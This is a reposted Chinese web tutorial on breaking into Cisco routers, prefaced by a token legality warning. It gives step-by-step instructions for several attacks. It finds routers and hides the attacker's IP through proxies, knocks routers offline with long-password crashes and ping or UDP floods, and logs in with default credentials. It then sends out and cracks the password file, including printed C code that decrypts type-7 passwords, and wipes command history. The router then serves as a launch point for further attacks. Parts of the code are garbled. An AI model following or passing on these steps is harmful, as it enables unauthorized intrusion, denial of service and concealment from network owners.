攻擊CISCO路由器

2019-11-05 00:39:11

字體：大中小

來源：轉載

供稿：網友

　　警告：
　　
　　不要用這破壞cisco系統，或非法訪問系統。這篇文章只是以學習為目的。只可以用在合法行為，不能破壞任何系統。這篇文章將一步一步的向你展示如何利用發現的缺陷來獲得非法訪問。假如你攻入了一個cisco路由器，或者擾亂了系統，將會中斷數百個網絡客戶機，造成大量損失。所以，只可以在被答應的情況下進行，否則你將會有許多麻煩
　　
　　-----------------------------
　　目錄:
　　-----------------------------在你看之前需要了解的:
　　
　?。裁词?a >ip地址？
　　
　　－什么是ISP？
　　
　?。裁词荰CP/IP數據包？
　　
　　－怎樣隱藏你的IP地址？
　　
　　－怎樣使用Telnet？
　　
　　－怎樣使用HyperTerminal？
　　
　?。鯓邮褂肞ing？
　　
　　－怎樣使用TraceRoute？
　　
　　－怎樣使用代理服務器？
　　
　　---------------------------
　　
　?。谝欢危簽槭裁垂鬰isco路由器？
　　
　?。诙危涸鯓诱业揭粋€cisco路由器？
　　
　?。谌危涸鯓雨J入一個cisco路由器？
　　
　?。谒亩危涸鯓悠平饷艽a？
　　
　?。谖宥危涸鯓邮褂靡粋€cisco路由器？
　　-----------------------------
　　你看之前需要了解的知識：
　　-----------------------------
　　什么是IP地址？
　　
　　IP是Internet PRotocol的縮寫,電腦通過IP地址來識別網絡中的其它電腦，與其連接。這就是你為什么會
　　
　　在IRC中被踢走，并且找到你的ISP和你的大概位置。IP地址是很輕易得到的，基本上可以由以下幾種方法
　　
　　獲得：
　　
　　-你訪問某網站,你的IP被記錄
　　
　　-在IRC中,某人得到你的IP地址
　　
　　-在ICQ，OICQ中,可以簡單的得到你的IP地址，使用一些小工具。
　　
　　-假如你的電腦和某人連接起來，運行 systat即可看到和那些電腦連接（以IP地址顯示）
　　
　　-某人發給你一封用java程序寫的郵件，可以得到你的IP地址
　　
　　還有其它許多方法得到IP地址，包括使用一些木馬和后門程序。
　　
　　-----------------------------
　　什么是ISP？
　　
　　ISP是Internet Service Provider的縮寫,你通過它們連接到internet.你撥號后就會連接和其連接。我
　　
　　們可以運行一個traceroute（跟蹤路徑）來尋找我們的ISP（traceroute 在后面還會介紹).
　　
　　你應該看到像這樣:
　　
　　tracert 222.222.22.22
　　
　　Tracing route to [221.223.24.54]
　　
　　over a maximum of 30 hops.
　　
　　1 147ms 122ms 132ms your.isp [222.222.22.21]<<<你的ISP
　　
　　2 122ms 143ms 123ms isp.firewall [222.222.22.20]<　　
　　你也可以打開/關閉 "local echo"。假如你打開了"local echo"，你的電腦將顯示你輸入的任何東西，
　　
　　并且連接上的電腦將顯示回應。
　　
　　所以你將會看到就像這些：
　　
　　你輸入 "hello",你看到的是
　　
　　hhelelollo
　　
　　這是因為返回的信息和你輸入的內容已經混合起來了。我這樣做的唯一的原因是看連接的機器對我的輸入，
　　
　　是否產生回應。
　　
　　在默認的情況下，telnet只會通過telnet端口連接，即是斷口23。你并不會只通過端口23連接，所以你連
　　
　　接的時候，你可以任意改變端口。你可以改成25，那是郵件服務程序的端口。也可以是21，那是FTP的端口。
　　
　　總共有上千個端口，所以你要選擇正確的端口！
　　
　　----------------------------
　　
　　怎樣使用超級終端？
　　
　　超級終端可以讓你的電腦的任意端口進行監聽某臺電腦，假如有信息來到這個端口，就可以進行傳輸件。超
　　
　　級終端在開始>程序>附件>通訊中，沒有的話，你可以通過控制面板中安裝。首先，你要選擇連接協議，我
　　
　　們選"TCP/IP Winsock"，接著輸入要連接的電腦，下面選擇端口?？梢赃x擇Call>Wait for Call，來等待
　　
　　文件。這樣其它的電腦就可以通過某個端口連接上你了，你也可以聊天，或者傳送文件了。
　　
　　:我的超級終端可能不一樣，沒有這個功能。
　　
　　-----------------------------怎樣使用Ping？
　　
　　Ping的使用很簡單，在MS-DOS方式下，輸入“ping IP地址”，默認是ping三次，你也可以自己設定。
　　
　　"ping ip地址 -t"
　　
　　可以使其不停的ping。
　　改變 ping 的大小可以這樣做:
　　"ping -l (size) ip.address"
　　ping其實是向遠程的機器發送數據包，遠程的機器接收到就會把數據包原路返回，我們可以看到這個過程的
　　時間。時間越短，速度就越快，當然，擁擠的時候，就會發生數據包丟失。 Ping 會減慢被ping的電腦的速度，流量過大的時候，甚至使其down機。一分鐘的ping攻擊就可以使一臺win98的電腦崩潰。(因為它的連接緩沖區溢出 - 連接過量，所以Windows決定休息休息了:>).ping攻擊也會占用你許多帶寬，所以你的帶寬要比目標機器大(除非目標機器運行的是Windows 98，而且你有個不錯的貓，那么一分鐘內，你就可以叫它下臺).Ping攻擊對強壯的系統沒有效果。注重: DOS's -t 選項不是一個ping攻擊,它只是很小的連接一下，而且中間有很多間隔。在Unix或linux的機器中，你可以用上參數－f 進行真正的ping攻擊。其實，假如你的分布是POSIX-compliant (POSIX -
　　Portable Operating System Interface based on uniX)，否則那就不是真正的Unix/Linux 分布。那么假如你有個 OS，稱自己既是Unix，又是Linux，那么就是有－f 。
　　------------------------------
　　
　　怎樣使用TraceRoute？
　　
　　要跟蹤你的連接（可以觀察到目標機器的連接路線），只要在MS-DOS方式下，輸入“tracert IP地址”。你將會看到一個電腦的目錄，就是你和目標之間通過的機器。.你可以用此方法確定是否存在防火墻，也可以確定某人的ISP(internet service provider)。
　　要確定ISP，只要看目標機器的前一個IP地址，那就應該是ISP的路由器。基本上說，這就是traceroute怎樣工作－一個 TCP/IP 數據包，在它的頭部有一個值(在IP的頭部。假如你不知道這是什么意思，沒關系，你接著往下看就可以了)稱作 TTL,它是Time To Live的縮寫。當一個數據包通過路由器的時候，它的TTL值就會減少。這樣可能會使數據包在網絡中流竄，消耗帶寬。所以每當一個數據包TTL值達到0的時候，它就會失效并且因為一個ICMP錯誤返回到發送者?，F在traceroute 先發送一個TTL值為1的數據包，那么它很快就會返回。查看ICMP錯誤的頭部，traceroute就可以知道數據包第一步通過哪。接著就會發送TTL值為2的數據包，返回后，就是第二次通過的地方。依次下去，直到最終的目的地，就可以知道整個路徑。
　　現在你是不是明白了呢? :-)
　　------------------------------
　　怎樣使用代理服務器？
　　
　　在網上尋找一個代理服務器，包括你需要的打開的端口的代理服務器。找到后，你可以用telnet 或
　　hyperterminal通過代理服務器連接到另外一臺電腦上。這樣做對方的電腦就不可以確定你的IP地址。
　　
　　------------------------------
　　第一段：為什么攻擊cisco路由器？
　　
　　你可能會想.. 為什么要攻擊 cisco 路由器呢? 答案就是那樣做將對闖入其它的系統非常有用...Cisco路由器非常的快，在一個系統中，一些會是以18 T1連接。而且它們非常靈活，盡管大多數運行telnet，但是它們可以在DoS攻擊或攻入其它系統時發揮作用。它們同時還會有成千的數據包通過。但是可以被捕捉進行譯碼...許多的cisco路由器受托于系統，它們可以讓你獲得其網絡中訪問其它電腦的確切的數量。
　　----------------------------
　　第二段：怎樣找到一個cisco路由器？
　　
　　尋找一個cisco路由器可以說是以項簡單的任務，幾乎所有的ISP至少通過一個cisco路由器。最簡單的方法是在dos下運行tracert，你可以跟蹤到電腦之間的許多電腦，在這之間，必有一個 “cisco”這個名字。假如你發現了，記下它的IP地址。在中國未必有cisco這個名字，但是肯定有路由器的，你可以用SuperScan掃描前兩個IP地址，看哪個開2001端口（Cisco路由器治理）和23端口即是的啦！現在，你有cisco路由器的位置了，但是它可能還有一個防火墻保護它，所以你要檢查一下它是否被封鎖ping連接的次數，假如有回應，它就有可能未被封鎖。另外一種方法就是試著訪問cisco路由器的一些端口。你用telnet即可，端口23，假如它要輸入密碼，未叫輸入用戶名，你就可能在一個防火墻。試著找一個未受防火墻保護的路由器，因為這篇教程主題是路由器，不是教你怎樣通過防火墻。當你確信找到一個好的系統，你應該找一個可以使用23端口的代理服務器，這樣你的IP地址就不會被路由器記錄下來了。:找到一臺運行Wingate的機器即可。
　　-----------------------------
　　第三段：怎樣闖入一個cisco路由器？
　　
　　Cisco路由器運行 V4.1 版本的軟件（現在普遍使用的），這很輕易干掉。你只要通過代理服務器連接到
　　一個cisco路由器，輸入一串很長的密碼，如：
　　
　　10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
　　
　　10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
　　
　　10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
　　
　　10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
　　
　　現在開始等，cisco系統將會重新啟動，可以說你已經攻擊它，使它離線了...但是過2-10分鐘，它就會恢復，我們應該進入它。假如什么都沒發生,那么它運行的不是脆弱的軟件,你可以多試幾種DoS攻擊，比如大量的 ping.到dos下，輸入 "ping -l 56550 cisco.router.ip -t",這會起到同樣的效果. 很有可能以上兩種方法都不行，反正是要其down機，那么試試那個攻擊yahoo的udpFlood，一定可以使其down機。一定要注重小心啊！我相信你應該知道該怎么保護自己。假如它被動結,就另找一個代理服務器進行連接。并且用戶名為"admin"，密碼為"admin"，因為這是默認的。
　　因為當它暫時的disabled，它將恢復到默認狀態。你到我主頁，會有一篇文章包括幾乎所有的路由器的默認用戶名和密碼?，F在，你已經進入了，你應該獲得密碼文件！系統運行不同的軟件，但大部分有個像"htl-textil"這類的提示，現在輸入"?"，觀看命。你會看到有很多的命令，你會發現一個傳送命令，用這個命令，在當前Admin用戶的情況下，把密碼文件發送到你的電腦23端口上。但是在這之前，你要把你的超級終端設定好。你發送文件之后，超級終端將問你是否接收文件，你選擇是并保存在電腦中即可。離線. 你通過了最難的部分，下面預備開始破解密碼。
　　------------------------------
　　第四段：怎樣破解密碼？
　　
　　現在，你獲得了密碼文件，你要破解它才能繼續進入路由器。所以你可以運行John the Ripper之類的軟件破譯它。
　　
　　這是我推薦的最簡單的方法.另一種方法是試著把它解碼。這樣做需要一個解碼軟件，使用某些解碼軟件，你還要有足夠的耐心。
　　
　　這兒有一個專門為cisco路由器密碼文件解碼的軟件，你可以在Linux中編譯它:
　　
　　#include
　　
　　#include
　　
　　char xlat[] = {
　　
　　0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
　　
　　0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
　　
　　0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
　　
　　};
　　
　　char pw_str1[] = "passWord 7 ";
　　
　　char pw_str2[] = "enable-password 7 ";
　　
　　char *pname;
　　
　　cdecrypt(enc_pw, dec_pw)
　　
　　char *enc_pw;
　　
　　char *dec_pw;
　　
　　{
　　
　　unsigned int seed, i, val = 0;
　　
　　if(strlen(enc_pw) & 1)
　　
　　return(-1);
　　
　　seed = (enc_pw[0] - ?') * 10 + enc_pw[1] - ?'
　　
　　if (seed > 15 !isdigit(enc_pw[0]) !isdigit(enc_pw[1]))
　　
　　return(-1);
　　
　　for (i = 2 ; i <= strlen(enc_pw); i++) {
　　
　　if(i !=2 && !(i & 1)) {
　　
　　dec_pw[i / 2 - 2] = val ^ xlat[seed++];
　　
　　val = 0;
　　
　　}
　　
　　val *= 16;
　　
　　if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
　　
　　val += enc_pw[i] - ?'
　　
　　continue;
　　
　　}
　　
　　if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
　　
　　val += enc_pw[i] - 'A' + 10;
　　
　　continue;
　　
　　}
　　
　　if(strlen(enc_pw) != i)
　　
　　return(-1);
　　
　　}
　　
　　dec_pw[++i / 2] = 0;
　　
　　return(0);
　　
　　}
　　
　　usage()
　　
　　{
　　
　　fprintf(stdout, "Usage: %s -p /n", pname);
　　
　　fprintf(stdout, " %s /n", pname);
　　
　　return(0);
　　
　　}
　　
　　main(argc,argv)
　　
　　int argc;
　　
　　char **argv;
　　
　　{
　　
　　FILE *in = stdin, *out = stdout;
　　
　　char line[257];
　　
　　char passwd[65];
　　
　　unsigned int i, pw_pos;
　　
　　pname = argv[0];
　　
　　if(argc > 1)
　　
　　{
　　
　　if(argc > 3) {
　　
　　usage();
　　
　　exit(1);
　　
　　}
　　
　　if(argv[1][0] == '-')
　　
　　{
　　
　　switch(argv[1][1]) {
　　
　　case 'h':
　　
　　usage();
　　
　　break;
　　
　　case 'p':
　　
　　if(cdecrypt(argv[2], passwd)) {
　　
　　fprintf(stderr, "Error./n");
　　
　　exit(1);
　　
　　}
　　
　　fprintf(stdout, "password: %s/n", passwd);
　　
　　break;
　　
　　default:
　　
　　fprintf(stderr, "%s: unknow option.", pname);
　　
　　}
　　
　　return(0);
　　
　　}
　　
　　if((in = fopen(argv[1], "rt")) == NULL)
　　
　　exit(1);
　　
　　if(argc > 2)
　　
　　if((out = fopen(argv[2], "wt")) == NULL)
　　
　　exit(1);
　　
　　}
　　
　　while(1) {
　　
　　for(i = 0; i < 256; i++) {
　　
　　if((line[i] = fgetc(in)) == EOF) {
　　
　　if(i)
　　
　　break;
　　
　　fclose(in);
　　
　　fclose(out);
　　
　　return(0);
　　
　　}
　　
　　if(line[i] == '/r')
　　
　　i--;
　　
　　if(line[i] == '/n')
　　
　　break;
　　
　　}
　　
　　pw_pos = 0;
　　
　　line[i] = 0;
　　
　　if(!strncmp(line, pw_str1, strlen(pw_str1)))
　　
　　pw_pos = strlen(pw_str1);
　　
　　if(!strncmp(line, pw_str2, strlen(pw_str2)))
　　
　　pw_pos = strlen(pw_str2);
　　
　　if(!pw_pos) {
　　
　　fprintf(stdout, "%s/n", line);
　　
　　continue;
　　
　　}
　　
　　if(cdecrypt(&line[pw_pos], passwd)) {
　　
　　fprintf(stderr, "Error./n");
　　
　　exit(1);
　　
　　}
　　
　　else {
　　
　　if(pw_pos == strlen(pw_str1))
　　
　　fprintf(out, "%s", pw_str1);
　　
　　else
　　
　　fprintf(out, "%s", pw_str2);
　　
　　fprintf(out, "%s/n", passwd);
　　
　　}
　　
　　}
　　
　　}
　　
　　假如你沒有使用Linux，你就只好用John the Ripper之類的軟件，帶上密碼檔，進行暴利破解。
　　
　　-----------------------------
　　第五段：怎樣使用一個cisco路由器？
　　
　　要使用它，你先必須連接到它，你可以用代理，以免你的IP地址被記下。當你進入的時候，假如你想關閉歷史記錄來掩蓋你的行為，你只要輸入"terminal history size 0"。這樣就不會被記下什么了! 輸入 "?"來看路由器中的命令，大多數你都可以用的。這些路由器一般都有telnet，所以你可以通過telnet連接到其它的系統上(比如unix boxes)，并且攻擊它們。你還可以使用ping 和 traceroute 進行跟蹤系統或進行DoS攻擊。你也可以監聽數據包，但我不推薦這樣做，因為并不是一定成功，而且會被發現....
　　-----------------------------
　　假如你第一次沒有攻入cisco，不要擔心...你一兩次是不可能成功的。它需要不斷的練習和超強的耐力。
　　這兒只向你將怎樣做...一定要在合法的情況下進行??！

上一篇：路由器功能指標詳解

下一篇：cisco2621路由器NAT配置實例